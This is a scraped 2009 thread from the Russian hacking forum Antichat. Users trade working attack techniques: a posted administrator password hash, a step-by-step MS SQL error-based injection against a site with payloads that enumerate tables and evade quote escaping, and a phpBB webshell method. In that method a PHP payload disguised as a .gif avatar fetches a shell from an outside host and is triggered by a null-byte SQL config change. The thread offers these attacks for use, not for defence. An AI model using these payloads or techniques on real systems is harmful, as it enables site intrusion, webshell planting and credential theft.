Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

15.07.2009, 12:56
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме: 6075534
Репутация:
2731
|
|
Тут БД mysql. В текущей таблице находятся даные о пользователях mysql. Чтобы просмотреть их - нажми "Обзор"
|
|
|

15.07.2009, 13:34
|
|
Новичок
Регистрация: 13.07.2009
Сообщений: 5
Провел на форуме: 36005
Репутация:
0
|
|
Зашёл в раздел pwweb в таблице pw_users:
Username NoN,
Password 875e527b6de108747f61decbd553947e:zHoPeRWthe816pjgR ...
Usertype Super Administrator
Какой тип хеша используется?
|
|
|

15.07.2009, 13:44
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме: 791766
Репутация:
61
|
|
Привет
У меня всего 2 раза был опыт MS SQL inj И тут решил спонить старое
нашёл инъекцию
Код:
http://site.ru/index.php?name=Links'
далее довёл до ума
Код:
http://site.ru/index.php?name=Links'))--
\Потом начал крутить таблицы
Код:
http://site.ru/index.php?name=Links'))+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES)--
получил 1 табличку audit и решил проверить что ниже
Код:
http://site.ru/index.php?name=Links'))+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('audit'))--
На что меня послали куда подальше
Код:
message: Incorrect syntax near 'audit\'.
видно что он скобку экранировал...(пробовал " ' `)
Как можно это обойти?
Попробовал в хексе но написал еррор
Код:
message: Conversion failed when converting the nvarchar value 'audit' to data type int.
Последний раз редактировалось Byrger; 15.07.2009 в 14:05..
|
|
|

15.07.2009, 14:12
|
|
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме: 7452489
Репутация:
1359
|
|
http://site.ru/index.php?name=Links'))+or+1=(SELECT+TOP+1+TABLE_N AME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAM E+NOT+IN+(SELECT+TOP+Х+TABLE_N AME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAM E))--
Х меняешь от одного вверх
|
|
|

15.07.2009, 14:19
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме: 791766
Репутация:
61
|
|
Сообщение от geezer.code
http://site.ru/index.php?name=Links'))+or+1=(SELECT+TOP+1+TABLE_N AME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAM E+NOT+IN+(SELECT+TOP+Х+TABLE_N AME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAM E))--
Х меняешь от одного вверх
Код:
message: An expression of non-boolean type specified in a context where a condition is expected, near ')'.
|
|
|

15.07.2009, 14:25
|
|
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме: 7452489
Репутация:
1359
|
|
Сообщение от Byrger
Код:
message: An expression of non-boolean type specified in a context where a condition is expected, near ')'.
http://site.ru/index.php?name=Links'))+or+1=(SELECT+TOP+1+TABLE_N AME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAM E+NOT+IN+(SELECT+TOP+Х+TABLE_N AME+FROM+INFORMATION_SCHEMA.TABLES))--
сорри ,невнимательность.
но мог бы и сам догадаться.
|
|
|

15.07.2009, 14:29
|
|
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
Провел на форуме: 3217552
Репутация:
1668
|
|
Код:
_http://site.ru/index.php?name=Links'))+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+(char(97)%2Bchar(117)%2Bchar(100)%2Bchar(105)%2Bchar(116)))--
еще можно попробовать having заюзать..
http://forum.antichat.ru/showpost.php?p=445214&postcount=23
|
|
|

15.07.2009, 16:15
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме: 5290740
Репутация:
912
|
|
Возникла проблема... Пробую залить шелл в phpbb! есть права админа... пробую этот способ:
...
6) Загрузка аваторы с php кодом, а затем инклюд.(Нужны права админа)
Бага тоже очень распространненая, тока почему то ее, мало юзают.
Создаем файл kiborg.txt, пишем в него
Код:
<?
$file= fopen('shell.php', 'w');
fwrite($file, '<? @include("http://kiborg.h10.ru/shell/sim.txt"); ?>');
fclose($file);
?>
Меняем имя файла на kiborg.gif и загружаем его на форум.
Заходим в профайл убеждаемся что аватора загрузилась и смотрим ее имя с путем, будет примерно следующее
/images/avatars/49624519384cd7deb.gif
Создаем файл 1.sql с содержимым
Код:
UPDATE phpbb_config SET config_value=CONCAT('english/../../images/avatars/49624519384cd7deb.gif',CHAR(0)) where config_name='default_lang';
Ну если с мозгами все в порядке, то поймете что здесь накалякано. Востанавливаем через бд.
Ползем по ссылке
http://localhost/phpbb13/faq.php
И если вы все сделали правильно, то по адрессу http://localhost/phpbb13/shell.php должен быть ваш шелл.
Делаю всё как написано, но когда загружаю аватар выдаёт ошибку..((
Общая ошибка
Unable to upload file
DEBUG MODE
Line : 251
File : usercp_avatar.php
Подскажите в чём проблема... 
Последний раз редактировалось .:[melkiy]:.; 15.07.2009 в 16:21..
|
|
|

15.07.2009, 16:37
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме: 791766
Репутация:
61
|
|
Сообщение от geezer.code
http://site.ru/index.php?name=Links'))+or+1=(SELECT+TOP+1+TABLE_N AME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAM E+NOT+IN+(SELECT+TOP+Х+TABLE_N AME+FROM+INFORMATION_SCHEMA.TABLES))--
сорри ,невнимательность.
но мог бы и сам догадаться.
Хорошо, а как дальше колонки крутить если такая проблема?
|
|
|

15.07.2009, 16:45
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме: 6075534
Репутация:
2731
|
|
.:[melkiy]:., попробуй файлик залить на хост, а потом грузить на форум удаленно, не со своего компа. У меня была такая ситуация.
Byrger, дальше после NOT IN свою колонку вставляешь. Почитай статьи о MsSQL инъекциях.
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|